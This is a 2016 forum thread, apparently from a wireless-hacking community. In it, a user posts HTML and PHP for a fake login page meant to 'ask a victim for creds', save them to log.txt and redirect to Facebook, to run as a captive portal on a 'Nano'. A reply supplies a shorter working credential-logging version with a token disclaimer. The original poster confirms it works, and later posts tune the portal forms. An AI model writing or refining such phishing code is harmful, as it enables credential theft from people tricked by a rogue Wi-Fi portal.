Mother Posted October 14, 2016 Share Posted October 14, 2016 First off I am no coder so. I want to create a custom html that ask a victim for creds then post the creds to a txt file in current directory. So far I have a simple html . login.html <form action="login.php" method="post"> <input type="text" id="username" name="username"/> <input type="password" id="password" name="password"/> <input type="submit" name="Login" value="Login"> </form> login.php <html> <head> <title>Login</title> </head> <body> <?php //If Submit Button Is Clicked Do the Following if ($_POST['Login']){ $myFile = "log.txt"; $fh = fopen($myFile, "w+") or die("can't open file"); $stringData = $_POST['username'] . ":"; echo fwrite($fh, $stringData); $stringData = $_POST['password'] . "\n"; echo fwrite($fh, $stringData); fclose($fh); } ?> <script>location.href='https://facebook.com';</script> </body> </html> I am running this on Kali with Apache2. I can input the text and hit login then it redirects me to Facebook just fine. The only issue is that is does not create the log.txt in /var/www. I am on Kali 2016.2. I want to move this the the Nano for the captive portal. Any Ideas??? Thanks Quote Link to comment Share on other sites More sharing options...
Mother Posted October 15, 2016 Author Share Posted October 15, 2016 I will give that a try. Quote Link to comment Share on other sites More sharing options...
Mr.Pupp3T Posted October 16, 2016 Share Posted October 16, 2016 If you were not able to do above. Post below an ill help out. Quote Link to comment Share on other sites More sharing options...
Mother Posted October 17, 2016 Author Share Posted October 17, 2016 Ya that did not work. Quote Link to comment Share on other sites More sharing options...
newbi3 Posted October 17, 2016 Share Posted October 17, 2016 (edited) //If Submit Button Is Clicked Do the Following if ($_POST['Login']){ $myFile = "log.txt"; $fh = fopen($myFile, "w+") or die("can't open file"); $stringData = $_POST['username'] . ":"; echo fwrite($fh, $stringData); $stringData = $_POST['password'] . "\n"; echo fwrite($fh, $stringData); fclose($fh); } This would be a lot cleaner: if (isset($_POST['username'])) { file_put_contents("log.txt", $_POST['username'] . ' : ' . $_POST['password'], FILE_APPEND); } I didn't test it but it should work. Also I should point out that it appears that you are trying to do some phishing here.. phishing is against the forum rules so this will probably get locked. I'll leave my example up just for educational purposes but I do not condone phishing and if you use my code for that I'm not responsible. Edited October 17, 2016 by newbi3 Quote Link to comment Share on other sites More sharing options...
Mother Posted October 17, 2016 Author Share Posted October 17, 2016 Figured it out. I didnt have php installed correctly. Now to get it on the Nano. Quote Link to comment Share on other sites More sharing options...
vailixi Posted November 22, 2016 Share Posted November 22, 2016 @Mother I'm just going to say this one thing. When you talk about hacking you might replace the word "victim" with "target". Target seems the more appropriate and professional sounding. Quote Link to comment Share on other sites More sharing options...
Wiz Posted December 2, 2016 Share Posted December 2, 2016 Hi, not trying to hijack the thread but it seems that this would be the right place to ask coding questions related to captive portals. The following code works well on any browser except Safari what would be the equivalent. <input type="text" name="name" required> making a required field does not seem to work in Safari and users can just click the button leaving any text boxes blank and still get through. Quote Link to comment Share on other sites More sharing options...
Foxtrot Posted December 2, 2016 Share Posted December 2, 2016 2 hours ago, Wiz said: Hi, not trying to hijack the thread but it seems that this would be the right place to ask coding questions related to captive portals. The following code works well on any browser except Safari what would be the equivalent. <input type="text" name="name" required> making a required field does not seem to work in Safari and users can just click the button leaving any text boxes blank and still get through. http://stackoverflow.com/a/23261375 Quote Link to comment Share on other sites More sharing options...
Wiz Posted December 3, 2016 Share Posted December 3, 2016 Thanks for the link I did find that code in a search earlier but could not get it working, however I did resolve the problem using another approach. Now I need to make an email text box validate the proper format so that a user cannot enter any characters and get bye. Again this is for Safari since in other browsers it works well. Quote Link to comment Share on other sites More sharing options...
Foxtrot Posted December 3, 2016 Share Posted December 3, 2016 4 minutes ago, Wiz said: Thanks for the link I did find that code in a search earlier but could not get it working, however I did resolve the problem using another approach. Now I need to make an email text box validate the proper format so that a user cannot enter any characters and get bye. Again this is for Safari since in other browsers it works well. Client side data validation is bad, but you can do it in JavaScript with a simple if/else statement and a string match. Quote Link to comment Share on other sites More sharing options...
Wiz Posted December 3, 2016 Share Posted December 3, 2016 4 minutes ago, Foxtrot said: Client side data validation is bad, but you can do it in JavaScript with a simple if/else statement and a string match. Got it thanks. Quote Link to comment Share on other sites More sharing options...
kleo Posted December 13, 2016 Share Posted December 13, 2016 Recently created templates for the Evil Portal, link on my sig. Quote Link to comment Share on other sites More sharing options...
kerravon Posted December 13, 2016 Share Posted December 13, 2016 Excellent stuff Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.